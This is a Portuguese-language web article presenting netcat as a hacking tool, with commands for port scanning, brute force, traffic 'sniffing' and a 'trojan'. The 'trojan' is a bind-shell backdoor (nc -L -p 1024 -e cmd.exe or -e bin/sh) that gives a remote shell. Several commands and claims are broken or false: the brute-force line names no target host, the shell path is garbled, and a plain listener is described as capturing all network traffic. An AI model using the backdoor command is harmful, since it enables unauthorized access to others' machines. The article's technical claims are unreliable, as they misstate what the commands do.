PontoXP.com - Dicas e Informações Gerais.





NetCat o canivete suíço do TCP/IP

Autor: Oziel
Publicado em: Artigos

O NetCat é considerado pelos "hackers" o canivete suíço do TCP/IP, devido a sua incrível versatilidade, com o NC(NetCat), podemos fazer um scanner de portas, um trojan, um brute force, entre outras coisas.

Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter.
Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar a TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta
E = Redireciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.

Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:

Colocando uma porta em escuta:
Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saída do programa na tela "listening on [any] 8080 …", caso a opção -v não fosse inserida este texto não seria mostrado.

Fazendo um Port-Scanner com o netcat
nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazendo um trojan com o netcat
 Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.

Fazendo um ataque de brute force com o netcat
O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazendo um sniffer com o netcat
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída em um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt

Conclusão
Como podemos ver o NETCAT é uma faca de dois gumes é pode ser usado pelos dois lados da força, este artigo mostrou em detalhes as principais utilidades do netcat mais vale frisar que não são as únicas utilidades, e com um pouco de imaginação podemos fazer verdadeiras façanhas com este verdadeiro canivete suíço …

Aqui termina minha matéria sobre o canivete suíço do TCP/IP o netcat, espero que você tenha gostado.

loading...





PontoXP © 2006-2017 - Todos os direitos reservados.
Termos de uso | Contato | Anuncie| Assine os FEEDS RSS!